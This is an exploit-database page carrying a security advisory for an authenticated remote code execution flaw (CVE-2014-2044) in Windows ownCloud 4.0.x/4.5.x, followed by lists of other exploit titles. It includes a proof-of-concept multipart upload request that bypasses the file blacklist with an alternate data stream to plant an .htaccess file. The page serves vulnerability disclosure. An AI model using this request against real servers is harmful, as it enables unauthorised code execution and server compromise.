Menu

Search for hundreds of thousands of exploits

"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution"

Author

Exploit author

Portcullis

Platform

Exploit platform

multiple

Release date

Exploit published date

2014-03-10

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
Vulnerability title: Remote Code Execution in ownCloud
CVE: CVE-2014-2044
Vendor: ownCloud
Product: ownCloud
Affected version: 4.0.x & 4.5.x
Fixed version: 5.0
Reported by: Alejo Murillo Moya

Details:

A remote code execution has been found and confirmed within ownCloud as
an authenticated user. A successful attack could allow an authenticated
attacker to execute PHP code, which could lead to a full compromise of
the server and associated infrastructure. Please note that only the
Windows versions of ownCloud are affected and that valid credentials are
required.

It is possible to create a custom .htaccess into the user's folder on
Windows version of the application, which will enable PHP execution on
the folder. This vulnerability exists because it is possible to bypass
the internal blacklists using Windows ADS (Alternate Data Streams).

Proof Of Concept:

  POST /owncloud_5.0.14a/owncloud/?app=files&getfile=ajax%2Fupload.php HTTP/1.1
  [...]
  Content-Type: multipart/form-data; boundary=---------------------------21191376031994875607185408411
  Requesttoken: None

  -----------------------------21191376031994875607185408411
  Content-Disposition: form-data; name="MAX_FILE_SIZE" 

  536870912
  -----------------------------21191376031994875607185408411
  Content-Disposition: form-data; name="requesttoken" 

  None
  -----------------------------21191376031994875607185408411
  Content-Disposition: form-data; name="dir" 

  /
  -----------------------------21191376031994875607185408411
  Content-Disposition: form-data; name="files[]"; filename=".htaccess::$DATA" 
  Content-Type: text/plain

  <PUT YOUR TEXT HERE>
  -----------------------------21191376031994875607185408411--


        

Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2016-02-03 "Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting" webapps hardware Portcullis
2015-09-25 "X2Engine 4.2 - Cross-Site Request Forgery" webapps php Portcullis
2015-09-25 "X2Engine 4.2 - Arbitrary File Upload" webapps php Portcullis
2015-07-14 "Pimcore CMS Build 3450 - Directory Traversal" webapps xml Portcullis
2015-04-21 "BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion" webapps cfm Portcullis
2014-12-10 "OpenEMR 4.1.2(7) - Multiple SQL Injections" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.4.99.5 - Remote Command Execution" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.4.99.5 - Blind SQL Injection" webapps php Portcullis
2014-10-28 "Enalean Tuleap 7.2 - XML External Entity File Disclosure" webapps php Portcullis
2014-10-02 "PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution" webapps php Portcullis
2014-10-02 "TestLink 1.9.11 - Multiple SQL Injections" webapps php Portcullis
2014-06-12 "IBM AIX 6.1.8 - 'libodm' Arbitrary File Write" local aix Portcullis
2014-05-14 "Broadcom PIPA C211 - Sensitive Information Disclosure" webapps hardware Portcullis
2014-04-24 "dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read" webapps php Portcullis
2014-03-12 "Procentia IntelliPen 1.1.12.1520 - 'data.aspx' Blind SQL Injection" webapps asp Portcullis
2014-03-12 "vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion" webapps php Portcullis
2014-03-10 "ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution" webapps multiple Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - SQL Injection" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Arbitrary File Disclosure" webapps windows Portcullis
2014-03-01 "Oracle Demantra 12.2.1 - Database Credentials Disclosure" webapps windows Portcullis
2008-05-11 "ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection" webapps php Portcullis
2008-05-08 "SAP Internet Transaction Server 6200.1017.50954.0 Bu (WGate) - 'wgate.dll?~service' Cross-Site Scripting" webapps cgi Portcullis
2008-05-08 "SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting" webapps cgi Portcullis 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected